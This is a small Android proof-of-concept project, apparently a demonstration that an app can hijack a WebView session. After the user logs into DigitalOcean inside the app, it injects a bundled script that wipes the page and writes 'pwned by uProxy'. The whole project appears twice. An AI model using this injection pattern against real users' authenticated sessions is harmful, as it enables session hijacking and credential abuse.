jab/AndroidManifest.xml

## activity_main.xml
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout
    xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    android:orientation="vertical">
    <TextView android:id="@+id/txt"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:text="This hint is set based on the webview's current URL." />
    <WebView android:id="@+id/wv"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content" />
</LinearLayout>

## AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="org.uproxy.webviewhijack">

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
    <uses-permission android:name="android.permission.INTERNET" />
</manifest>

## hijack.js
document.documentElement.remove();
document.write('pwned by uProxy');

## MainActivity.java
package org.uproxy.webviewhijack;

import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Log;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.widget.TextView;

public class MainActivity extends AppCompatActivity {

    private uProxyWebViewClient wvc;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        wvc = new uProxyWebViewClient(this);
        WebView wv = (WebView) findViewById(R.id.wv);
        wv.setWebViewClient(wvc);
        WebSettings ws = wv.getSettings();
        ws.setJavaScriptEnabled(true);
        ws.setAllowUniversalAccessFromFileURLs(true);
        wv.loadUrl("https://cloud.digitalocean.com/login");
        onPageFinished(wv, wv.getUrl());
    }

    public void onPageFinished(WebView wv, String url) {
        TextView tv = (TextView) findViewById(R.id.txt);
        Log.i("MainActivity", url);
        if (url.equals("https://cloud.digitalocean.com/login")) {
            tv.setText("Log into DigitalOcean below.");
        } else if (url.equals("https://cloud.digitalocean.com/droplets")) {
            tv.setText("You logged in successfully! Injecting custom script into the page.");
            wvc.injectJS(wv);
        } else {
            tv.setText("The webview loaded an unrecognized URL, no contextual help available: " + url);
        }
    }
}

## uProxyWebViewClient.java
package org.uproxy.webviewhijack;

import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.IOException;
import java.io.InputStream;

public class uProxyWebViewClient extends WebViewClient {
    private MainActivity parent;
    private String injectedScript;

    public uProxyWebViewClient(MainActivity main) {
        super();
        parent = main;
        byte[] buffer;
        try (InputStream input = parent.getAssets().open("js/hijack.js")) {
            buffer = new byte[input.available()];
            input.read(buffer);
            injectedScript = new String(buffer, "utf-8");
            input.close();
        } catch (IOException e) {
            e.printStackTrace();
            throw new RuntimeException("Could not read js/hijack.js");
        }
    }

    @Override
    public boolean shouldOverrideUrlLoading(WebView webview, String url) {
        return false;
    }

    @Override
    public void onPageFinished(WebView wv, String url) {
        super.onPageFinished(wv, url);
        parent.onPageFinished(wv, url);

    }

    public void injectJS(WebView wv) {
        wv.evaluateJavascript(injectedScript, null);
    }
}
	<?xml version="1.0" encoding="utf-8"?>
	<LinearLayout
	xmlns:android="http://schemas.android.com/apk/res/android"
	xmlns:tools="http://schemas.android.com/tools"
	android:layout_width="match_parent"
	android:layout_height="match_parent"
	android:orientation="vertical">
	<TextView android:id="@+id/txt"
	android:layout_width="wrap_content"
	android:layout_height="wrap_content"
	android:text="This hint is set based on the webview's current URL." />
	<WebView android:id="@+id/wv"
	android:layout_width="wrap_content"
	android:layout_height="wrap_content" />
	</LinearLayout>
	<?xml version="1.0" encoding="utf-8"?>
	<manifest xmlns:android="http://schemas.android.com/apk/res/android"
	package="org.uproxy.webviewhijack">

	<application
	android:allowBackup="true"
	android:icon="@mipmap/ic_launcher"
	android:label="@string/app_name"
	android:supportsRtl="true"
	android:theme="@style/AppTheme">
	<activity android:name=".MainActivity">
	<intent-filter>
	<action android:name="android.intent.action.MAIN" />
	<category android:name="android.intent.category.LAUNCHER" />
	</intent-filter>
	</activity>
	</application>
	<uses-permission android:name="android.permission.INTERNET" />
	</manifest>
	document.documentElement.remove();
	document.write('pwned by uProxy');
	package org.uproxy.webviewhijack;

	import android.os.Bundle;
	import android.support.v7.app.AppCompatActivity;
	import android.util.Log;
	import android.webkit.WebSettings;
	import android.webkit.WebView;
	import android.widget.TextView;

	public class MainActivity extends AppCompatActivity {

	private uProxyWebViewClient wvc;

	@Override
	protected void onCreate(Bundle savedInstanceState) {
	super.onCreate(savedInstanceState);
	setContentView(R.layout.activity_main);
	wvc = new uProxyWebViewClient(this);
	WebView wv = (WebView) findViewById(R.id.wv);
	wv.setWebViewClient(wvc);
	WebSettings ws = wv.getSettings();
	ws.setJavaScriptEnabled(true);
	ws.setAllowUniversalAccessFromFileURLs(true);
	wv.loadUrl("https://cloud.digitalocean.com/login");
	onPageFinished(wv, wv.getUrl());
	}

	public void onPageFinished(WebView wv, String url) {
	TextView tv = (TextView) findViewById(R.id.txt);
	Log.i("MainActivity", url);
	if (url.equals("https://cloud.digitalocean.com/login")) {
	tv.setText("Log into DigitalOcean below.");
	} else if (url.equals("https://cloud.digitalocean.com/droplets")) {
	tv.setText("You logged in successfully! Injecting custom script into the page.");
	wvc.injectJS(wv);
	} else {
	tv.setText("The webview loaded an unrecognized URL, no contextual help available: " + url);
	}
	}
	}
	package org.uproxy.webviewhijack;

	import android.webkit.WebView;
	import android.webkit.WebViewClient;

	import java.io.IOException;
	import java.io.InputStream;

	public class uProxyWebViewClient extends WebViewClient {
	private MainActivity parent;
	private String injectedScript;

	public uProxyWebViewClient(MainActivity main) {
	super();
	parent = main;
	byte[] buffer;
	try (InputStream input = parent.getAssets().open("js/hijack.js")) {
	buffer = new byte[input.available()];
	input.read(buffer);
	injectedScript = new String(buffer, "utf-8");
	input.close();
	} catch (IOException e) {
	e.printStackTrace();
	throw new RuntimeException("Could not read js/hijack.js");
	}
	}

	@Override
	public boolean shouldOverrideUrlLoading(WebView webview, String url) {
	return false;
	}

	@Override
	public void onPageFinished(WebView wv, String url) {
	super.onPageFinished(wv, url);
	parent.onPageFinished(wv, url);

	}

	public void injectJS(WebView wv) {
	wv.evaluateJavascript(injectedScript, null);
	}
	}